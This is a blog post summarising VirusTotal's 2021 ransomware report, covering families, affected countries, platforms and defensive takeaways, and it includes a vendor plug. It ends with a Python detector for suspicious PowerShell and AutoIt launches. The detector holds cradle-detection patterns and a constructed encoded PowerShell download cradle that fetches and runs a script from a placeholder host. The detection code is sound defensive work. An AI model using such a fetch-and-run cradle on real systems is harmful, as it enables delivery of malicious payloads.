VirusTotal's Analysis of 80 Million Ransomware Samples Reveals the Current State of Cybersecurity Landscape

By Vinith Sengunthar, October 20, 2021

After analyzing around 80 million ransomware-related samples submitted from 140 countries since 2020, VirusTotal has published its first ransomware report. The report identifies about 130 ransomware families that were active during 2020 and the first half of 2021. Based on daily submission volumes, attack activity was highest during the first two quarters of 2020, when the Covid-19 pandemic was at its height. Israel was the most affected country, with an almost 600% increase in submissions compared to its previous baseline, followed by South Korea, Vietnam, China, Singapore, and India.

[Figure: ransomware submissions by country. Source: https://storage.googleapis.com/vtpublic/vt-ransomware-report-2021.pdf]

The 2020 peak is mostly attributed to the GandCrab family, which emerged as the most active family with around 78.5% of samples. A second peak in July 2021 was driven by the Babuk family. Following GandCrab were Babuk, Cerber, Matsnu, and WannaCry with 7.61%, 3.11%, 2.63%, and 2.41% of samples, respectively.

[Figure: pie chart of the top 10 most active ransomware families. Source: https://storage.googleapis.com/vtpublic/vt-ransomware-report-2021.pdf]

Although these 10 families top the list, the report found a total of 130 different families active.
Interestingly, while the bigger ransomware campaigns come and go, several smaller ones were constantly active throughout the analysis period. The study also found that Windows remains the most targeted platform: around 95% of the samples were Windows executables or dynamic link libraries (DLLs). Android was the second most targeted platform, with 2.09% of samples being Android-based.

[Figure: distribution of samples by file type. Source: https://storage.googleapis.com/vtpublic/vt-ransomware-report-2021.pdf]

Although there were numerous ransomware attempts, only about 5% of the samples were associated with exploits. This is consistent with how ransomware is usually deployed: through social engineering or droppers rather than exploitation. Based on this 5% of samples, a few common artifacts used for malware distribution and lateral movement were identified. Topping the list were Emotet, Zbot, Dridex, Gozi, and Danabot. Other artifacts identified were Mimikatz and Cobalt Strike; scripting languages such as AutoIt and PowerShell; and remote access Trojans (RATs) and other commodity malware such as Phorpiex, SmokeLoader, NanoCore, and Pony Stealer.

Some other key findings from the report include:

- Although a few big campaigns reused existing samples, in most cases attackers prepared fresh samples.
- Besides a few spikes that come and go, there is always a baseline of activity from small campaigns.
- Exploits were usually used only for privilege escalation and lateral movement within the network, not for initial access.
- Attackers took a range of different and innovative approaches to penetrate systems.

Final Thoughts

Constantly rising ransomware activity suggests that every organization worldwide is a potential target. Hence, the report also highlights a few takeaways for building an effective anti-ransomware strategy:
- Efficient detection of malware-distribution infrastructure and droppers
- A patching strategy that prioritizes Windows privilege-escalation vulnerabilities
- Better detection of scripting-language abuse (such as PowerShell and AutoIt) and of lateral-movement tools
- Regular monitoring of worldwide ransomware activity, with security strategies updated accordingly
- Resilience and recovery plans that still work when detection fails

You can seek assistance from a comprehensive cybersecurity service provider's tools, such as SharkStriker's XDR, for detection, mitigation, prevention, and recovery. Such tools and services can help you monitor your IT infrastructure 24/7 and use machine-accelerated threat hunting for better resilience.
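The scripting-language and lateral-movement takeaway is where most day-to-day detection work lands, so here is a worked illustration of what such a check looks like. This is example code written for this summary; it is not from VirusTotal's report or from any SharkStriker product. It triages constructed process-creation events (the field names, hostnames, paths, and the encoded payload are all made up) for the PowerShell and AutoIt patterns the report names as common artifacts: base64-encoded commands that hide download cradles, hidden-window and no-profile flags, the AutoIt interpreter or its scripts running from user-writable paths, and script hosts spawned by Office applications.

```python
"""Flag suspicious PowerShell / AutoIt launches in process-creation events.

Example code added to illustrate the takeaway above; not from VirusTotal's
report or any vendor product. The event format and all samples are constructed.
"""
import base64
import re
from typing import Optional

# Command-line switches commonly seen when PowerShell is scripted for payload delivery.
PS_FLAGS = [
    (re.compile(r"-nop(?:rofile)?\b", re.I), "no profile"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-noni(?:nteractive)?\b", re.I), "non-interactive"),
]
# -EncodedCommand and its short aliases followed by a base64 blob (longest alias first).
ENC_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Download-cradle / in-memory execution keywords.
CRADLE_RE = re.compile(
    r"(IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|FromBase64String)",
    re.I)
# Paths an unprivileged user can write to; interpreters or scripts here deserve a look.
USER_WRITABLE_RE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|Users\\Public|Windows\\Temp|ProgramData)\\", re.I)
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "autoit3.exe")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation event and list the indicators it tripped."""
    image = event["image"]
    exe = image.lower().rsplit("\\", 1)[-1]
    parent = event.get("parent", "").lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"]
    reasons = []

    if exe in ("powershell.exe", "pwsh.exe"):
        for pattern, why in PS_FLAGS:
            if pattern.search(cmd):
                reasons.append(why)
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded command")
            hit = CRADLE_RE.search(decoded)
            if hit:
                reasons.append(f"download cradle in decoded script: {hit.group(1)}")
        else:
            hit = CRADLE_RE.search(cmd)
            if hit:
                reasons.append(f"download cradle on command line: {hit.group(1)}")

    if exe == "autoit3.exe" and (USER_WRITABLE_RE.search(image) or USER_WRITABLE_RE.search(cmd)):
        reasons.append("AutoIt interpreter or script in user-writable path")

    if exe in SCRIPT_HOSTS and parent in OFFICE_APPS:
        reasons.append(f"script host spawned by Office application: {parent}")

    return {"id": event["id"], "host": event["host"], "suspicious": bool(reasons), "reasons": reasons}


def triage(events: list) -> list:
    """Return findings only for events that tripped at least one indicator."""
    return [r for r in (analyze_event(e) for e in events) if r["suspicious"]]


# Constructed sample events (not real telemetry). The encoded payload is built here
# so the reader can see what the base64 blob on the command line hides.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"id": 2, "host": "WS02", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"id": 3, "host": "WS03", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\AutoIt3.exe",
     "cmdline": r'AutoIt3.exe "C:\Users\alice\AppData\Local\Temp\invoice.a3x"'},
    {"id": 4, "host": "WS04", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe",
     "cmdline": r'AutoIt3.exe "C:\Program Files\IT Tools\deploy.au3"'},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["host"], "->", "; ".join(finding["reasons"]))
```

Run as-is, it reports WS02 (no profile, hidden window, encoded command carrying an IEX download cradle, spawned by WINWORD.EXE) and WS03 (AutoIt run from a user's Temp folder), while the scheduled backup script and the AutoIt deployment tool under Program Files stay quiet. The decode step matters: the cradle keywords never appear on the raw command line, so a rule that only greps the command line misses exactly the launches the report's artifacts list is about. In production the same logic would read Sysmon event ID 1 or Windows 4688 records and the indicator list would be tuned against the environment's own baseline.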